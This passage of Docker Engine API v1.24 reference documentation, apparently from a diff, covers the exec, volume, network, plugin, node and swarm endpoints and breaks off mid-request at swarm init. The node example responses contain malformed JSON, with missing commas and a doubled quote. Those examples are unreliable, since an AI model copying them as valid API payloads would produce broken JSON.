+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **DetachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Privileged** - Boolean value, runs the exec process with extended privileges.
+-   **User** - A string value specifying the user, and optionally, group to run
+        the exec process inside the container. Format is one of: `"user"`,
+        `"user:group"`, `"uid"`, or `"uid:gid"`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** - server error
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
+    POST /v1.24/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **409** - container is paused
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`.  The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.24/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.24/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "CanRemove": false,
+      "ContainerID": "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126",
+      "DetachKeys": "",
+      "ExitCode": 2,
+      "ID": "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b",
+      "OpenStderr": true,
+      "OpenStdin": true,
+      "OpenStdout": true,
+      "ProcessConfig": {
+        "arguments": [
+          "-c",
+          "exit 2"
+        ],
+        "entrypoint": "sh",
+        "privileged": false,
+        "tty": true,
+        "user": "1000"
+      },
+      "Running": false
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such exec instance
+-   **500** - server error
+
+### 3.4 Volumes
+
+#### List volumes
+
+`GET /volumes`
+
+**Example request**:
+
+    GET /v1.24/volumes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Volumes": [
+        {
+          "Name": "tardis",
+          "Driver": "local",
+          "Mountpoint": "/var/lib/docker/volumes/tardis",
+          "Labels": null,
+          "Scope": "local"
+        }
+      ],
+      "Warnings": []
+    }
+
+**Query parameters**:
+
+- **filters** - JSON encoded value of the filters (a `map[string][]string`) to process on the volumes list. Available filters:
+  -   `name=<volume-name>` Matches all or part of a volume name.
+  -   `dangling=<boolean>` When set to `true` (or `1`), returns all volumes that are "dangling" (not in use by a container). When set to `false` (or `0`), only volumes that are in use by one or more containers are returned.
+  -   `driver=<volume-driver-name>` Matches all or part of a volume driver name.
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a volume
+
+`POST /volumes/create`
+
+Create a volume
+
+**Example request**:
+
+    POST /v1.24/volumes/create HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Labels": {
+        "com.example.some-label": "some-value",
+        "com.example.some-other-label": "some-other-value"
+      },
+      "Driver": "custom"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "custom",
+      "Mountpoint": "/var/lib/docker/volumes/tardis",
+      "Status": {
+        "hello": "world"
+      },
+      "Labels": {
+        "com.example.some-label": "some-value",
+        "com.example.some-other-label": "some-other-value"
+      },
+      "Scope": "local"
+    }
+
+**Status codes**:
+
+- **201** - no error
+- **500**  - server error
+
+**JSON parameters**:
+
+- **Name** - The new volume's name. If not specified, Docker generates a name.
+- **Driver** - Name of the volume driver to use. Defaults to `local` for the name.
+- **DriverOpts** - A mapping of driver options and values. These options are
+    passed directly to the driver and are driver specific.
+- **Labels** - Labels to set on the volume, specified as a map: `{"key":"value","key2":"value2"}`
+
+**JSON fields in response**:
+
+Refer to the [inspect a volume](#inspect-a-volume) section or details about the
+JSON fields returned in the response.
+
+#### Inspect a volume
+
+`GET /volumes/(name)`
+
+Return low-level information on the volume `name`
+
+**Example request**:
+
+    GET /v1.24/volumes/tardis
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Name": "tardis",
+      "Driver": "custom",
+      "Mountpoint": "/var/lib/docker/volumes/tardis/_data",
+      "Status": {
+        "hello": "world"
+      },
+      "Labels": {
+          "com.example.some-label": "some-value",
+          "com.example.some-other-label": "some-other-value"
+      },
+      "Scope": "local"
+    }
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - no such volume
+-   **500** - server error
+
+**JSON fields in response**:
+
+The following fields can be returned in the API response. Empty fields, or
+fields that are not supported by the volume's driver may be omitted in the
+response.
+
+- **Name** - Name of the volume.
+- **Driver** - Name of the volume driver used by the volume.
+- **Mountpoint** - Mount path of the volume on the host.
+- **Status** - Low-level details about the volume, provided by the volume driver.
+    Details are returned as a map with key/value pairs: `{"key":"value","key2":"value2"}`.
+    The `Status` field is optional, and is omitted if the volume driver does not
+    support this feature.
+- **Labels** - Labels set on the volume, specified as a map: `{"key":"value","key2":"value2"}`.
+- **Scope** - Scope describes the level at which the volume exists, can be one of
+    `global` for cluster-wide or `local` for machine level. The default is `local`.
+
+#### Remove a volume
+
+`DELETE /volumes/(name)`
+
+Instruct the driver to remove the volume (`name`).
+
+**Example request**:
+
+    DELETE /v1.24/volumes/tardis HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** - no error
+-   **404** - no such volume or volume driver
+-   **409** - volume is in use and cannot be removed
+-   **500** - server error
+
+### 3.5 Networks
+
+#### List networks
+
+`GET /networks`
+
+**Example request**:
+
+    GET /v1.24/networks?filters={"type":{"custom":true}} HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+[
+  {
+    "Name": "bridge",
+    "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566",
+    "Scope": "local",
+    "Driver": "bridge",
+    "EnableIPv6": false,
+    "Internal": false,
+    "IPAM": {
+      "Driver": "default",
+      "Config": [
+        {
+          "Subnet": "172.17.0.0/16"
+        }
+      ]
+    },
+    "Containers": {
+      "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": {
+        "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda",
+        "MacAddress": "02:42:ac:11:00:02",
+        "IPv4Address": "172.17.0.2/16",
+        "IPv6Address": ""
+      }
+    },
+    "Options": {
+      "com.docker.network.bridge.default_bridge": "true",
+      "com.docker.network.bridge.enable_icc": "true",
+      "com.docker.network.bridge.enable_ip_masquerade": "true",
+      "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+      "com.docker.network.bridge.name": "docker0",
+      "com.docker.network.driver.mtu": "1500"
+    }
+  },
+  {
+    "Name": "none",
+    "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794",
+    "Scope": "local",
+    "Driver": "null",
+    "EnableIPv6": false,
+    "Internal": false,
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  },
+  {
+    "Name": "host",
+    "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e",
+    "Scope": "local",
+    "Driver": "host",
+    "EnableIPv6": false,
+    "Internal": false,
+    "IPAM": {
+      "Driver": "default",
+      "Config": []
+    },
+    "Containers": {},
+    "Options": {}
+  }
+]
+```
+
+**Query parameters**:
+
+- **filters** - JSON encoded network list filter. The filter value is one of:
+  -   `driver=<driver-name>` Matches a network's driver.
+  -   `id=<network-id>` Matches all or part of a network id.
+  -   `label=<key>` or `label=<key>=<value>` of a network label.
+  -   `name=<network-name>` Matches all or part of a network name.
+  -   `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks.
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Inspect network
+
+`GET /networks/<network-id>`
+
+**Example request**:
+
+    GET /v1.24/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+{
+  "Name": "net01",
+  "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99",
+  "Scope": "local",
+  "Driver": "bridge",
+  "EnableIPv6": false,
+  "IPAM": {
+    "Driver": "default",
+    "Config": [
+      {
+        "Subnet": "172.19.0.0/16",
+        "Gateway": "172.19.0.1"
+      }
+    ],
+    "Options": {
+        "foo": "bar"
+    }
+  },
+  "Internal": false,
+  "Containers": {
+    "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": {
+      "Name": "test",
+      "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a",
+      "MacAddress": "02:42:ac:13:00:02",
+      "IPv4Address": "172.19.0.2/16",
+      "IPv6Address": ""
+    }
+  },
+  "Options": {
+    "com.docker.network.bridge.default_bridge": "true",
+    "com.docker.network.bridge.enable_icc": "true",
+    "com.docker.network.bridge.enable_ip_masquerade": "true",
+    "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+    "com.docker.network.bridge.name": "docker0",
+    "com.docker.network.driver.mtu": "1500"
+  },
+  "Labels": {
+    "com.example.some-label": "some-value",
+    "com.example.some-other-label": "some-other-value"
+  }
+}
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - network not found
+
+#### Create a network
+
+`POST /networks/create`
+
+Create a network
+
+**Example request**:
+
+```
+POST /v1.24/networks/create HTTP/1.1
+Content-Type: application/json
+
+{
+  "Name":"isolated_nw",
+  "CheckDuplicate":true,
+  "Driver":"bridge",
+  "EnableIPv6": true,
+  "IPAM":{
+    "Driver": "default",
+    "Config":[
+      {
+        "Subnet":"172.20.0.0/16",
+        "IPRange":"172.20.10.0/24",
+        "Gateway":"172.20.10.11"
+      },
+      {
+        "Subnet":"2001:db8:abcd::/64",
+        "Gateway":"2001:db8:abcd::1011"
+      }
+    ],
+    "Options": {
+      "foo": "bar"
+    }
+  },
+  "Internal":true,
+  "Options": {
+    "com.docker.network.bridge.default_bridge": "true",
+    "com.docker.network.bridge.enable_icc": "true",
+    "com.docker.network.bridge.enable_ip_masquerade": "true",
+    "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
+    "com.docker.network.bridge.name": "docker0",
+    "com.docker.network.driver.mtu": "1500"
+  },
+  "Labels": {
+    "com.example.some-label": "some-value",
+    "com.example.some-other-label": "some-other-value"
+  }
+}
+```
+
+**Example response**:
+
+```
+HTTP/1.1 201 Created
+Content-Type: application/json
+
+{
+  "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30",
+  "Warning": ""
+}
+```
+
+**Status codes**:
+
+- **201** - no error
+- **403** - operation not supported for pre-defined networks
+- **404** - plugin not found
+- **500** - server error
+
+**JSON parameters**:
+
+- **Name** - The new network's name. this is a mandatory field
+- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false`
+- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver
+- **Internal** - Restrict external access to the network
+- **IPAM** - Optional custom IP scheme for the network
+  - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver
+  - **Config** - List of IPAM configuration options, specified as a map:
+      `{"Subnet": <CIDR>, "IPRange": <CIDR>, "Gateway": <IP address>, "AuxAddress": <device_name:IP address>}`
+  - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}`
+- **EnableIPv6** - Enable IPv6 on the network
+- **Options** - Network specific options to be used by the drivers
+- **Labels** - Labels to set on the network, specified as a map: `{"key":"value" [,"key2":"value2"]}`
+
+#### Connect a container to a network
+
+`POST /networks/(id)/connect`
+
+Connect a container to a network
+
+**Example request**:
+
+```
+POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4",
+  "EndpointConfig": {
+    "IPAMConfig": {
+        "IPv4Address":"172.24.56.89",
+        "IPv6Address":"2001:db8::5689"
+    }
+  }
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **403** - operation not supported for swarm scoped networks
+- **404** - network or container is not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **container** - container-id/name to be connected to the network
+
+#### Disconnect a container from a network
+
+`POST /networks/(id)/disconnect`
+
+Disconnect a container from a network
+
+**Example request**:
+
+```
+POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1
+Content-Type: application/json
+
+{
+  "Container":"3613f73ba0e4",
+  "Force":false
+}
+```
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+- **200** - no error
+- **403** - operation not supported for swarm scoped networks
+- **404** - network or container not found
+- **500** - Internal Server Error
+
+**JSON parameters**:
+
+- **Container** - container-id/name to be disconnected from a network
+- **Force** - Force the container to disconnect from a network
+
+#### Remove a network
+
+`DELETE /networks/(id)`
+
+Instruct the driver to remove the network (`id`).
+
+**Example request**:
+
+    DELETE /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** - no error
+-   **404** - no such network
+-   **500** - server error
+
+### 3.6 Plugins (experimental)
+
+#### List plugins
+
+`GET /plugins`
+
+Returns information about installed plugins.
+
+**Example request**:
+
+    GET /v1.24/plugins HTTP/1.1
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+[
+  {
+    "Id": "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078",
+    "Name": "tiborvass/no-remove",
+    "Tag": "latest",
+    "Active": true,
+    "Config": {
+      "Mounts": [
+        {
+          "Name": "",
+          "Description": "",
+          "Settable": null,
+          "Source": "/data",
+          "Destination": "/data",
+          "Type": "bind",
+          "Options": [
+            "shared",
+            "rbind"
+          ]
+        },
+        {
+          "Name": "",
+          "Description": "",
+          "Settable": null,
+          "Source": null,
+          "Destination": "/foobar",
+          "Type": "tmpfs",
+          "Options": null
+        }
+      ],
+      "Env": [
+        "DEBUG=1"
+      ],
+      "Args": null,
+      "Devices": null
+    },
+    "Manifest": {
+      "ManifestVersion": "v0",
+      "Description": "A test plugin for Docker",
+      "Documentation": "https://docs.docker.com/engine/extend/plugins/",
+      "Interface": {
+        "Types": [
+          "docker.volumedriver/1.0"
+        ],
+        "Socket": "plugins.sock"
+      },
+      "Entrypoint": [
+        "plugin-no-remove",
+        "/data"
+      ],
+      "Workdir": "",
+      "User": {
+      },
+      "Network": {
+        "Type": "host"
+      },
+      "Capabilities": null,
+      "Mounts": [
+        {
+          "Name": "",
+          "Description": "",
+          "Settable": null,
+          "Source": "/data",
+          "Destination": "/data",
+          "Type": "bind",
+          "Options": [
+            "shared",
+            "rbind"
+          ]
+        },
+        {
+          "Name": "",
+          "Description": "",
+          "Settable": null,
+          "Source": null,
+          "Destination": "/foobar",
+          "Type": "tmpfs",
+          "Options": null
+        }
+      ],
+      "Devices": [
+        {
+          "Name": "device",
+          "Description": "a host device to mount",
+          "Settable": null,
+          "Path": "/dev/cpu_dma_latency"
+        }
+      ],
+      "Env": [
+        {
+          "Name": "DEBUG",
+          "Description": "If set, prints debug messages",
+          "Settable": null,
+          "Value": "1"
+        }
+      ],
+      "Args": {
+        "Name": "args",
+        "Description": "command line arguments",
+        "Settable": null,
+        "Value": [
+
+        ]
+      }
+    }
+  }
+]
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Install a plugin
+
+`POST /plugins/pull?name=<plugin name>`
+
+Pulls and installs a plugin. After the plugin is installed, it can be enabled
+using the [`POST /plugins/(plugin name)/enable` endpoint](#enable-a-plugin).
+
+**Example request**:
+
+```
+POST /v1.24/plugins/pull?name=tiborvass/no-remove:latest HTTP/1.1
+```
+
+The `:latest` tag is optional, and is used as default if omitted. When using
+this endpoint to pull a plugin from the registry, the `X-Registry-Auth` header
+can be used to include a base64-encoded AuthConfig object. Refer to the [create
+an image](#create-an-image) section for more details.
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+Content-Length: 175
+
+[
+  {
+    "Name": "network",
+    "Description": "",
+    "Value": [
+      "host"
+    ]
+  },
+  {
+    "Name": "mount",
+    "Description": "",
+    "Value": [
+      "/data"
+    ]
+  },
+  {
+    "Name": "device",
+    "Description": "",
+    "Value": [
+      "/dev/cpu_dma_latency"
+    ]
+  }
+]
+```
+
+**Query parameters**:
+
+- **name** -  Name of the plugin to pull. The name may include a tag or digest.
+    This parameter is required.
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - error parsing reference / not a valid repository/tag: repository
+      name must have at least one component
+-   **500** - plugin already exists
+
+#### Inspect a plugin
+
+`GET /plugins/(plugin name)`
+
+Returns detailed information about an installed plugin.
+
+**Example request**:
+
+```
+GET /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1
+```
+
+The `:latest` tag is optional, and is used as default if omitted.
+
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Type: application/json
+
+{
+  "Id": "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078",
+  "Name": "tiborvass/no-remove",
+  "Tag": "latest",
+  "Active": false,
+  "Config": {
+    "Mounts": [
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": "/data",
+        "Destination": "/data",
+        "Type": "bind",
+        "Options": [
+          "shared",
+          "rbind"
+        ]
+      },
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": null,
+        "Destination": "/foobar",
+        "Type": "tmpfs",
+        "Options": null
+      }
+    ],
+    "Env": [
+      "DEBUG=1"
+    ],
+    "Args": null,
+    "Devices": null
+  },
+  "Manifest": {
+    "ManifestVersion": "v0",
+    "Description": "A test plugin for Docker",
+    "Documentation": "https://docs.docker.com/engine/extend/plugins/",
+    "Interface": {
+      "Types": [
+        "docker.volumedriver/1.0"
+      ],
+      "Socket": "plugins.sock"
+    },
+    "Entrypoint": [
+      "plugin-no-remove",
+      "/data"
+    ],
+    "Workdir": "",
+    "User": {
+    },
+    "Network": {
+      "Type": "host"
+    },
+    "Capabilities": null,
+    "Mounts": [
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": "/data",
+        "Destination": "/data",
+        "Type": "bind",
+        "Options": [
+          "shared",
+          "rbind"
+        ]
+      },
+      {
+        "Name": "",
+        "Description": "",
+        "Settable": null,
+        "Source": null,
+        "Destination": "/foobar",
+        "Type": "tmpfs",
+        "Options": null
+      }
+    ],
+    "Devices": [
+      {
+        "Name": "device",
+        "Description": "a host device to mount",
+        "Settable": null,
+        "Path": "/dev/cpu_dma_latency"
+      }
+    ],
+    "Env": [
+      {
+        "Name": "DEBUG",
+        "Description": "If set, prints debug messages",
+        "Settable": null,
+        "Value": "1"
+      }
+    ],
+    "Args": {
+      "Name": "args",
+      "Description": "command line arguments",
+      "Settable": null,
+      "Value": [
+
+      ]
+    }
+  }
+}
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - plugin not installed
+
+#### Enable a plugin
+
+`POST /plugins/(plugin name)/enable`
+
+Enables a plugin
+
+**Example request**:
+
+```
+POST /v1.24/plugins/tiborvass/no-remove:latest/enable HTTP/1.1
+```
+
+The `:latest` tag is optional, and is used as default if omitted.
+
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Length: 0
+Content-Type: text/plain; charset=utf-8
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - plugin is already enabled
+
+#### Disable a plugin
+
+`POST /plugins/(plugin name)/disable`
+
+Disables a plugin
+
+**Example request**:
+
+```
+POST /v1.24/plugins/tiborvass/no-remove:latest/disable HTTP/1.1
+```
+
+The `:latest` tag is optional, and is used as default if omitted.
+
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Length: 0
+Content-Type: text/plain; charset=utf-8
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - plugin is already disabled
+
+#### Remove a plugin
+
+`DELETE /plugins/(plugin name)`
+
+Removes a plugin
+
+**Example request**:
+
+```
+DELETE /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1
+```
+
+The `:latest` tag is optional, and is used as default if omitted.
+
+**Example response**:
+
+```
+HTTP/1.1 200 OK
+Content-Length: 0
+Content-Type: text/plain; charset=utf-8
+```
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - plugin not installed
+-   **500** - plugin is active
+
+<!-- TODO Document "docker plugin push" endpoint once we have "plugin build"
+
+#### Push a plugin
+
+`POST /v1.24/plugins/tiborvass/(plugin name)/push HTTP/1.1`
+
+Pushes a plugin to the registry.
+
+**Example request**:
+
+```
+POST /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1
+```
+
+The `:latest` tag is optional, and is used as default if omitted. When using
+this endpoint to push a plugin to the registry, the `X-Registry-Auth` header
+can be used to include a base64-encoded AuthConfig object. Refer to the [create
+an image](#create-an-image) section for more details.
+
+**Example response**:
+
+**Status codes**:
+
+-   **200** - no error
+-   **404** - plugin not installed
+
+-->
+
+### 3.7 Nodes
+
+**Note**: Node operations require the engine to be part of a swarm.
+
+#### List nodes
+
+
+`GET /nodes`
+
+List nodes
+
+**Example request**:
+
+    GET /v1.24/nodes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "ID": "24ifsmvkjbyhk",
+        "Version": {
+          "Index": 8
+        },
+        "CreatedAt": "2016-06-07T20:31:11.853781916Z",
+        "UpdatedAt": "2016-06-07T20:31:11.999868824Z",
+        "Spec": {
+          "Name": "my-node",
+          "Role": "manager",
+          "Availability": "active"
+          "Labels": {
+              "foo": "bar"
+          }
+        },
+        "Description": {
+          "Hostname": "bf3067039e47",
+          "Platform": {
+            "Architecture": "x86_64",
+            "OS": "linux"
+          },
+          "Resources": {
+            "NanoCPUs": 4000000000,
+            "MemoryBytes": 8272408576
+          },
+          "Engine": {
+            "EngineVersion": "1.12.0",
+            "Labels": {
+                "foo": "bar",
+            }
+            "Plugins": [
+              {
+                "Type": "Volume",
+                "Name": "local"
+              },
+              {
+                "Type": "Network",
+                "Name": "bridge"
+              }
+              {
+                "Type": "Network",
+                "Name": "null"
+              }
+              {
+                "Type": "Network",
+                "Name": "overlay"
+              }
+            ]
+          }
+        },
+        "Status": {
+          "State": "ready"
+        },
+        "ManagerStatus": {
+          "Leader": true,
+          "Reachability": "reachable",
+          "Addr": "172.17.0.2:2377""
+        }
+      }
+    ]
+
+**Query parameters**:
+
+- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the
+  nodes list. Available filters:
+  - `id=<node id>`
+  - `label=<engine label>`
+  - `membership=`(`accepted`|`pending`)`
+  - `name=<node name>`
+  - `role=`(`manager`|`worker`)`
+
+**Status codes**:
+
+-   **200** – no error
+-   **406** - node is not part of a swarm
+-   **500** – server error
+
+#### Inspect a node
+
+
+`GET /nodes/(id or name)`
+
+Return low-level information on the node `id`
+
+**Example request**:
+
+      GET /v1.24/nodes/24ifsmvkjbyhk HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "ID": "24ifsmvkjbyhk",
+      "Version": {
+        "Index": 8
+      },
+      "CreatedAt": "2016-06-07T20:31:11.853781916Z",
+      "UpdatedAt": "2016-06-07T20:31:11.999868824Z",
+      "Spec": {
+        "Name": "my-node",
+        "Role": "manager",
+        "Availability": "active"
+        "Labels": {
+            "foo": "bar"
+        }
+      },
+      "Description": {
+        "Hostname": "bf3067039e47",
+        "Platform": {
+          "Architecture": "x86_64",
+          "OS": "linux"
+        },
+        "Resources": {
+          "NanoCPUs": 4000000000,
+          "MemoryBytes": 8272408576
+        },
+        "Engine": {
+          "EngineVersion": "1.12.0",
+          "Labels": {
+              "foo": "bar",
+          }
+          "Plugins": [
+            {
+              "Type": "Volume",
+              "Name": "local"
+            },
+            {
+              "Type": "Network",
+              "Name": "bridge"
+            }
+            {
+              "Type": "Network",
+              "Name": "null"
+            }
+            {
+              "Type": "Network",
+              "Name": "overlay"
+            }
+          ]
+        }
+      },
+      "Status": {
+        "State": "ready"
+      },
+      "ManagerStatus": {
+        "Leader": true,
+        "Reachability": "reachable",
+        "Addr": "172.17.0.2:2377""
+      }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such node
+-   **406** – node is not part of a swarm
+-   **500** – server error
+
+#### Remove a node
+
+
+`DELETE /nodes/(id or name)`
+
+Remove a node from the swarm.
+
+**Example request**:
+
+    DELETE /v1.24/nodes/24ifsmvkjbyhk HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **force** - 1/True/true or 0/False/false, Force remove a node from the swarm.
+        Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such node
+-   **406** – node is not part of a swarm
+-   **500** – server error
+
+#### Update a node
+
+
+`POST /nodes/(id)/update`
+
+Update a node.
+
+The payload of the `POST` request is the new `NodeSpec` and
+overrides the current `NodeSpec` for the specified node.
+
+If `Availability` or `Role` are omitted, this returns an
+error. Any other field omitted resets the current value to either
+an empty value or the default cluster-wide value.
+
+**Example Request**
+
+    POST /v1.24/nodes/24ifsmvkjbyhk/update?version=8 HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "Availability": "active",
+      "Name": "node-name",
+      "Role": "manager",
+      "Labels": {
+        "foo": "bar"
+      }
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Length: 0
+    Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+- **version** – The version number of the node object being updated. This is
+  required to avoid conflicting writes.
+
+JSON Parameters:
+
+- **Annotations** – Optional medata to associate with the node.
+    - **Name** – User-defined name for the node.
+    - **Labels** – A map of labels to associate with the node (e.g.,
+      `{"key":"value", "key2":"value2"}`).
+- **Role** - Role of the node (worker/manager).
+- **Availability** - Availability of the node (active/pause/drain).
+
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such node
+-   **406** – node is not part of a swarm
+-   **500** – server error
+
+### 3.8 Swarm
+
+#### Inspect swarm
+
+
+`GET /swarm`
+
+Inspect swarm
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "CreatedAt" : "2016-08-15T16:00:20.349727406Z",
+      "Spec" : {
+        "Dispatcher" : {
+          "HeartbeatPeriod" : 5000000000
+        },
+        "Orchestration" : {
+         "TaskHistoryRetentionLimit" : 10
+        },
+        "CAConfig" : {
+          "NodeCertExpiry" : 7776000000000000
+        },
+        "Raft" : {
+          "LogEntriesForSlowFollowers" : 500,
+          "HeartbeatTick" : 1,
+          "SnapshotInterval" : 10000,
+          "ElectionTick" : 3
+        },
+        "TaskDefaults" : {},
+        "Name" : "default"
+      },
+     "JoinTokens" : {
+        "Worker" : "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a",
+        "Manager" : "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l"
+     },
+     "ID" : "70ilmkj2f6sp2137c753w2nmt",
+     "UpdatedAt" : "2016-08-15T16:32:09.623207604Z",
+     "Version" : {
+       "Index" : 51
+    }
+  }
+
+**Status codes**:
+
+-   **200** - no error
+-   **406** – node is not part of a swarm
+-   **500** - sever error
+
+#### Initialize a new swarm
+
+
+`POST /swarm/init`
+
+Initialize a new swarm. The body of the HTTP response includes the node ID.
+
+**Example request**:
+
+    POST /v1.24/swarm/init HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "ListenAddr": "0.0.0.0:2377",
+      "AdvertiseAddr": "192.168.1.1:2377",
+      "ForceNewCluster": false,
+      "Spec": {
